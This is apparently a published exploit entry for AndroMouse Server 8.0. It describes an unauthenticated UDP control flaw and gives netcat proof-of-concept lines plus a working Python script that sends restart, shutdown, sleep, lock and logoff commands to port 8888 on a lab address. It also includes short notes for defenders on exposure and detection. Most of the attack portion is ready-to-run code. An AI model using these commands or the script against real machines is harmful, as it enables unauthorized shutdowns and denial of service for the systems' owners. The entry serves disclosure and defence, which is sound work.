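# Exploit Title: AndroMouse Server 8.0 – Unauthenticated Remote System Control (Restart, Shutdown, Sleep, Lock)
# Date: 04/07/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://andromouse.com
# Software Link: https://andromouse-server.en.lo4d.com/windows
# Version: 8.0
# Tested on: Windows 10

'''
Description:

Unauthenticated Remote System Control in AndroMouse Server 8.0 allows
attackers to send UDP commands to remotely restart, shutdown, sleep, lock,
or log off the target machine without authentication. This leads to
unauthorized power state manipulation and potential denial of service.

POC:

echo -n "power_key_restart" | nc -u 192.168.8.104 8888
echo -n "power_key_shutdown" | nc -u 192.168.8.104 8888
echo -n "power_key_sleep" | nc -u 192.168.8.104 8888
echo -n "power_key_lock" | nc -u 192.168.8.104 8888
echo -n "power_key_logoff" | nc -u 192.168.8.104 8888

Notes for defenders:

- Root cause, as described above: the server acts on plain-text UDP
  datagrams on port 8888 with no authentication step, so any host that can
  reach the port can change the machine's power state.
- Exposure: check whether UDP 8888 is reachable from anything other than the
  device meant to control the machine. Limiting the port in the host
  firewall narrows the exposure; UDP source addresses can be spoofed, so
  address filtering is weaker than real authentication. This page lists no
  fixed version.
- Detection: inbound UDP/8888 payloads starting with "power_key_", and
  unexpected shutdown/restart/sleep/lock/logoff events on hosts running the
  server.
'''

import socket
import time
import sys

# Lab address and port used in the advisory's PoC lines.
TARGET_IP = "192.168.8.104"
TARGET_PORT = 8888

# The script terminates each command with a line feed, while the nc lines in
# the PoC use `echo -n` (no newline). NOTE(review): whether the server needs
# the terminator is not established by this page.
NEWLINE = b"\x0a"

# Not referenced anywhere in this listing (neither is the `time` import).
RETRY_DELAY = 3

# Command-line keyword -> literal command string sent in the datagram.
POWER_COMMANDS = {
    "sleep": "power_key_sleep",
    "shutdown": "power_key_shutdown",
    "restart": "power_key_restart",
    "lock": "power_key_lock",
    "logoff": "power_key_logoff",
}


def send_power_command(command):
    """Send one power command as a single UDP datagram.

    Args:
        command: A key of POWER_COMMANDS ("sleep", "shutdown", ...).

    Returns:
        True when the datagram was handed to the local network stack, False
        for an unknown command or a socket error. No reply is read, so True
        does not show that the server received or acted on the command.
    """
    wire_name = POWER_COMMANDS.get(command) if isinstance(command, str) else None
    if wire_name is None:
        # Unknown keyword: nothing is sent.
        return False

    try:
        # The context manager closes the socket on every path.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.settimeout(5)
            sock.sendto(wire_name.encode() + NEWLINE, (TARGET_IP, TARGET_PORT))
    except OSError as exc:
        # Report the reason instead of discarding it; callers still get False.
        print(f"Socket error: {exc}", file=sys.stderr)
        return False
    return True


if __name__ == "__main__":
    if len(sys.argv) != 2 or sys.argv[1].lower() not in POWER_COMMANDS:
        print(f"Usage: {sys.argv[0]} <{'|'.join(POWER_COMMANDS.keys())}>")
        sys.exit(1)

    if send_power_command(sys.argv[1].lower()):
        # "Sent" means transmitted only; UDP gives no delivery confirmation.
        print(f"Sent {sys.argv[1]} command")
    else:
        print("Failed to send command")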